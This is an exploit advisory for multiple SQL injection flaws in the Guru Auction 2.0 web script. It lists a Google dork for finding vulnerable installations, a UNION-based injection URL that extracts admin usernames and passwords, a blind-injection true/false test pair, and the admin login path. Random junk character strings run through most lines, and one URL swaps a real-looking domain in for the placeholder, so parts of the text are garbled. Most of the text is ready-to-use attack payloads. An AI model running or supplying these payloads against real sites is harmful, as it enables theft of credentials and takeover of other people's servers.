Guru Auction 2.0 Multiple SQL Injection Vulnerabilities( t" X7 O. @! A/ o2 }$ f4 i% E% D
# t# D+ ^' o V3 L D2 Y9 g
作者 : v3n0m) g! y) c# U$ I
应用 : Guru Auction 2.0
: u3 F% X: k3 iPrice : $49
2 ^. F& N3 u* m$ |) L/ B* {) WVendor : http://www.guruscript.com/% j" {8 E. U2 o2 }5 \) }
Google Dork : inurl:subcat.php?cate_id=
) n$ b/ Q P$ \% Q- O7 l + O' b& {8 q4 g' g5 W( _# E
SQLi p0c:
6 h" a& E7 x1 M8 ?~~~~~~~~~~8 \7 E' ^5 U7 O9 W% u$ x% K# B3 h
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
7 `# S6 i+ c( ^ ' y; f3 N; ?- x' A) E
- Q" W* x7 V; c盲注 p0c:0 D& U: J9 [: l& U3 S% X( {5 t
~~~~~~~~~~
) L4 ^' U Y# {1 H# K3 H- R& ehttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
6 a$ P9 b+ m% M6 r: v% S# f2 [. _8 {http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
9 S% Y" |8 F8 _" H) Q, ? ) c9 g9 S% Y+ M+ U
管理登录入口:
4 C( O1 E ^' Q {& s~~~~~~~~~~
9 y3 H( x7 F% m7 Khttp://domain.tld/[path]/admin/- w0 V7 h9 c( x9 N a! y
|